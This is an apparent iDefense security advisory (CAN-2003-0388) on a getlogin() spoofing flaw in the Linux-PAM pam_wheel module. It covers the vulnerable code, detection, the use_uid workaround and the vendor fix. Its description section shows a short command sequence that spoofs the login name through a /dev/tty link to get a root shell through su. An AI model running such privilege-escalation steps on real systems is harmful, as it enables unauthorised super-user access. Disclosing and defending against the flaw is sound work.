// back
Linux-PAM getlogin() Spoofing Vulnerability
06.16.03BACKGROUND
The Pluggable Authentication Module (PAM) is a flexible mechanism for authenticating users. More information is available at
http://www.kernel.org/pub/linux/libs/pam/.
DESCRIPTION
The pam_wheel module of Andrew G. Morgan's Linux-PAM uses getlogin() in an insecure manner, thereby allowing attackers to bypass certain restrictions. The pam_wheel module is often used with su(1) to allow users belonging to a trusted group to utilize the command without supplying a password. The module utilizes the getlogin() function to determine the name of the currently logged in user. This name is then compared against a list of members of a trusted group as specified in the configuration file. The following is a snippet of the offending section of code: fromsu = getlogin(); if (fromsu) { tpwd = getpwnam(fromsu); } ... ... ... /* * test if the user is a member of the group, or if the * user has the "wheel" (sic) group as its primary group. */ if (is_on_list(grp->gr_mem, fromsu) || (tpwd->pw_gid == grp->gr_gid)) { if (ctrl & PAM_DENY_ARG) { retval = PAM_PERM_DENIED; } else if (ctrl & PAM_TRUST_ARG) { retval = PAM_SUCCESS; /* this can be a sufficient check */ } else { retval = PAM_IGNORE; } } else { If the "trust" option is enabled in the pam_wheel configuration file and the "use_uid" option is disabled, any local user may spoof the username returned by getlogin() and gain access to a super-user account without supplying a password. The following is a sample exploitation scenario: $ w 10:32am up 3:26, 2 users, load average: 0.01, 0.01, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT root tty1 - 7:13am 3:03m 0.30s 0.22s -bash farmer pts/0 172.16.60.5 10:32am 0.00s 0.00s ? - $ logname farmer $ ln /dev/tty tty1 $ bash < tty1 $ logname root $ su - # id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
ANALYSIS
If the appropriate configuration options are enabled, and a member of the wheel group is currently logged in, any local user can spoof log entries, or, in the worst case scenario, obtain super-user privileges depending on the PAM configuration settings.
DETECTION
Linux-PAM 0.77 and previous versions are vulnerable, however, the necessary configuration for exploitability must also exist. More specifically, a trust of the wheel group must exist in an application such as su(1), and the use_uid option must not be enabled. This is usually not the default situation with most Linux installations. The following is a sample default nonvulnerable entry from /etc/pam.d/su in Redhat 7.3: # Uncomment the following line to implicitly trust users in the "wheel" group. #auth sufficient /lib/security/pam_wheel.so trust use_uid The following is a sample entry in /etc/pam.d/su that would be vulnerable to the described attack: # Uncomment the following line to implicitly trust users in the "wheel" group. auth sufficient /lib/security/pam_wheel.so trust
WORKAROUND
When utilizing the pam_wheel module, enable the use_uid option. Doing so should prevent the login name spoofing from circumventing PAM restrictions.
VENDOR RESPONSE
Andrew Morgan does not plan to release a new version of Linux-PAM, however, Linux-PAM 0.78, which does fix this flaw, is obtainable via the following CVS:
http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/pam/Linux-PAM/ Linux distributors will be releasing their own updates as appropriate.
CVE INFORMATION
The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project has assigned the identification number CAN-2003-0388 to this issue.
CREDIT
Karol Wiesek (appelast@bsquad.sm.pl) is credited with discovering this vulnerability.
http://www.verisigninc.com/en_AU/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml
windowTitle
Verisign’s iDefense VCP defines new vulnerabilities and exploits of 20,000+ applications, hardware and operating systems; and publicly publishes its research.
